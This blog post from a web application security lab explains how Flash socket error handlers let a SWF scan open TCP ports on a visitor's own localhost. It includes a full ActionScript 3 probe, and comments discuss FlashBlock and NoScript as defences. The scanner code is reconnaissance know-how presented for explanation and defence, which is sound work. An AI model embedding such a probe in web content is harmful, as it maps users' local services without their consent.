web application security lab

More Port Scanning - This Time in Flash

A few weeks ago fukami showed me a sample application he had written in Flash to do port scanning. It was actually really good, and accurate. It is probably the preferred method when the target has Flash installed, since it is fast. He asked me to wait to post until after he had released it, and he has now done so. Please check out his demo and writeup here. You’ll need both JS and Flash enabled for the demo to work.

The basic premise is that the error handler of the Flash socket control can be used to tell which TCP ports are open: a connection attempt to a closed port and one to a listening port fail differently, so the scanner never needs a successful connection, only the error. There also doesn’t seem to be any restriction against testing the viewer’s own localhost rather than the server the SWF is hosted on, which is a pretty bad cross-domain issue: any site that serves a SWF (or that is vulnerable to XSS and can be made to load one) can map the services on a visitor’s machine. He recommends downgrading Flash to 8 and/or using Flash only on trusted sites (which is only helpful if the site isn’t vulnerable to XSS). Great demo, and nice work by fukami!
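To make the mechanism concrete, here is an added ActionScript 3 sketch of a Flash 9 socket probe. It is not fukami’s code and not the demo linked above: one flash.net.Socket is opened per target port, and the result is decided by which event the player dispatches and how long it took. The target host, the port list, the timeout and the JavaScript callback name portResult are assumptions for illustration, and the exact mapping from event type and timing to port state depends on the Flash Player version, so it has to be calibrated against ports known to be open and closed before the results mean anything.

```actionscript
package {
    import flash.display.Sprite;
    import flash.events.Event;
    import flash.events.IOErrorEvent;
    import flash.events.SecurityErrorEvent;
    import flash.events.TimerEvent;
    import flash.external.ExternalInterface;
    import flash.net.Socket;
    import flash.utils.Timer;
    import flash.utils.getTimer;

    // Added illustration only (not fukami's scanner): one Socket per port, the
    // outcome read off the error handlers rather than off a completed connection.
    public class PortProbe extends Sprite {
        private var host:String;
        private var ports:Array;
        private var sock:Socket;
        private var port:int;
        private var started:int;
        private var timeout:Timer;

        public function PortProbe() {
            // Assumed target: the loopback of the machine viewing the page, not the
            // server the SWF was loaded from. That is exactly the cross-domain issue.
            host = "127.0.0.1";
            ports = [22, 80, 443, 3306, 8080];   // assumed port list
            next();
        }

        private function next():void {
            if (ports.length == 0) {
                return;
            }
            port = ports.shift();
            sock = new Socket();
            sock.addEventListener(Event.CONNECT, onConnect);
            sock.addEventListener(IOErrorEvent.IO_ERROR, onIoError);
            sock.addEventListener(SecurityErrorEvent.SECURITY_ERROR, onSecurityError);
            // Cap each probe: a filtered port may never produce any event.
            timeout = new Timer(3000, 1);        // assumed 3 s budget per port
            timeout.addEventListener(TimerEvent.TIMER, onTimeout);
            started = getTimer();
            try {
                sock.connect(host, port);
                timeout.start();
            } catch (e:SecurityError) {
                // Refused synchronously by the sandbox, e.g. a port the player reserves.
                report("denied", e.message);
            }
        }

        private function onConnect(e:Event):void {
            report("open", "connect");
        }

        private function onIoError(e:IOErrorEvent):void {
            // A closed port typically fails fast with an IO error; elapsed time is the tell.
            report("closed", e.text);
        }

        private function onSecurityError(e:SecurityErrorEvent):void {
            // Policy refusal. How this event and its timing line up against a fast IO
            // error is what separates a listener from a closed port; the split is
            // player-version dependent and must be calibrated, so it is reported raw.
            report("security-error", e.text);
        }

        private function onTimeout(e:TimerEvent):void {
            report("filtered", "no event before timeout");
        }

        private function report(state:String, detail:String):void {
            var elapsed:int = getTimer() - started;
            timeout.stop();
            try { sock.close(); } catch (e:Error) {}
            // Hand the result to page JavaScript (assumed callback portResult), which is
            // why the demo needs JS enabled as well as Flash.
            if (ExternalInterface.available) {
                ExternalInterface.call("portResult", host, port, state, elapsed, detail);
            }
            next();
        }
    }
}
```

The page-side JavaScript only has to define portResult(host, port, state, elapsedMs, detail) and collect the rows; everything that makes the scan possible happens inside the player, which is why NoScript-style blocking of the SWF itself, rather than of the page’s JavaScript, is the relevant control.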

4 Responses to “More Port Scanning - This Time in Flash”

  1. Darkster Says:

    It’s a bit scary to see what’s possible. Nevertheless, this app is awesome :)

  2. Giorgio Maone Says:

    “Using Flash only on trusted sites (which is only helpful if the site isn’t vulnerable to XSS)”

    By “using Flash only on trusted sites” you may either mean using FlashBlock or NoScript.

    If you’re using FlashBlock you’re not safe, because code execution is not reliably prevented (you’re just ensured you won’t see the movie).

    If you’re using NoScript to block Flash (NoScript Options|Advanced|Untrusted), you’ve got protection against reflective XSS, so “it’s helpful unless the trusted site is vulnerable to PERSISTENT XSS”.

    Furthermore, you can additionally enable the “noscript.contentBlocker” behavior ( http://noscript.net/features#contentblocking ): Flash content will be blocked by default even on “trusted” sites, until you explicitly enable each applet by clicking on it, after being notified about its origin.

  3. h3xStream Says:

    @Giorgio Maone
    FlashBlock isn’t only hiding Flash objects;
    it doesn’t load any until you manually activate them.

  4. Giorgio Maone Says:

    @h3xStream:
    you’re right, I’ve just tested it.
    Many thanks for the pointer :)